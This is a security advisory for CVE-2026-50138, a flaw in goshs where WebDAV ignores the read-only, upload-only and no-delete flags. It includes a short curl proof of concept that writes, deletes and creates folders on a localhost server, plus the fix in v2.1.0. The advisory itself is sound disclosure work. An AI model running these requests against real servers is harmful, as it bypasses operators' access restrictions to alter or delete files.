CVE-2026-50138: goshs WebDAV Mode-Flag Access Control Bypass
When goshs is started with WebDAV enabled, the --read-only, --upload-only, and --no-delete restriction flags are silently ignored on the WebDAV port, letting any authenticated client write, delete, or
The problem
goshs wires its WebDAV port directly to golang.org/x/net/webdav.Handler with no mode-flag middleware. The HTTP mux (server.go lines 134-204) checks fs.ReadOnly, fs.UploadOnly, and fs.NoDelete on every state-changing route, but the WebDAV mux (lines 207-238) skips all three checks entirely.
Any client with valid credentials, or no credentials when auth is disabled, can send PUT, DELETE, MKCOL, MOVE, and COPY to the WebDAV port regardless of the flags the operator passed at startup. The --upload-only flag is also bypassed in reverse: GET and PROPFIND still return file contents when they should be blocked.
Proof of concept
A working proof-of-concept for CVE-2026-50138 in goshs.de/goshs/v2, with the exact payload below.
# Start goshs with read-only mode AND WebDAV enabled
mkdir -p /tmp/r && echo secret > /tmp/r/x.txt
goshs -p 18000 -wp 18001 -w -ro -d /tmp/r -b admin:pw &
# HTTP port correctly enforces -ro
curl -u admin:pw -X PUT http://localhost:18000/y.txt --data x # 403
# WebDAV port ignores -ro completely
curl -u admin:pw -X PUT http://localhost:18001/y.txt --data x # 201 CREATED
curl -u admin:pw -X DELETE http://localhost:18001/x.txt # 204 NO CONTENT
curl -u admin:pw -X MKCOL http://localhost:18001/pwned/ # 201 CREATEDThe root cause is a missing enforcement layer in the WebDAV server setup. The fix in v2.1.0 inserts a wdGuard http.HandlerFunc in front of wdHandler that maps each WebDAV verb to the correct flag: PUT/MKCOL/MOVE/COPY are blocked when fs.ReadOnly or fs.UploadOnly is set, DELETE is blocked when fs.ReadOnly, fs.UploadOnly, or fs.NoDelete is set, and GET/PROPFIND/HEAD are blocked when fs.UploadOnly is set.
Because golang.org/x/net/webdav.Handler accepts every standard WebDAV method unconditionally, any gap in the wrapping middleware layer is a direct bypass. CWE-284 (Improper Access Control) applies: the capability existed but the policy was never applied to the second listener.
The fix
Upgrade to goshs v2.1.0. The release adds a per-verb guard middleware wrapping the WebDAV handler that enforces the same --read-only, --upload-only, and --no-delete semantics already present on the HTTP port. No configuration change is needed after upgrading.
Reported by Nishant Verma.
Related research
- high · 8.1Fission MessageQueueTrigger Secret Exfiltration and PodSpec Injection
- high · 7.7CVE-2026-49822CVE-2026-49822: Fission KubernetesWatchTrigger Cross-Namespace Event Leakage
- high · 7.7CVE-2026-49823CVE-2026-49823: Fission Cross-Namespace Package Read via Unvalidated PackageRef
- high · 8.5CVE-2026-49824CVE-2026-49824: Fission Cross-Namespace Environment Reference via Unvalidated EnvironmentRef